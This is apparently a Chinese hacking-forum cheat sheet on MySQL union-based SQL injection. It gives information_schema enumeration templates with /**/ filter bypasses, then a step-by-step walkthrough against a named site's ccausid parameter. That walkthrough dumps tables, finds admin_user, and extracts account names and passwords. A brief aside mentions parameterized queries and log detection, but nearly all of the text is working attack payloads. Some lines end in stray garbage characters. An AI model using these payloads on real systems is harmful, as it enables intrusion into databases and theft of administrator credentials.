查库
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
查表
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
查字段
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
MySQL 5 高级注入方法:暴表
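例子如下(这类请求之所以能成立,应是因为 ccausid 参数被直接拼接进了 SQL 语句;防御上应改用参数化查询,并按最小权限配置数据库账号,因为 information_schema 只会列出当前账号有权限访问的对象;访问日志中出现 information_schema、union select、/**/ 等特征可作为检测线索):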
1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
这样爆到第4个时出现了 admin_user 表。
2.暴字段
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*5 h9 J) ]; f- K1 S* `( k1 k- U; O- r: @
3.爆密码
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* * V4 K5 j* Q! g! g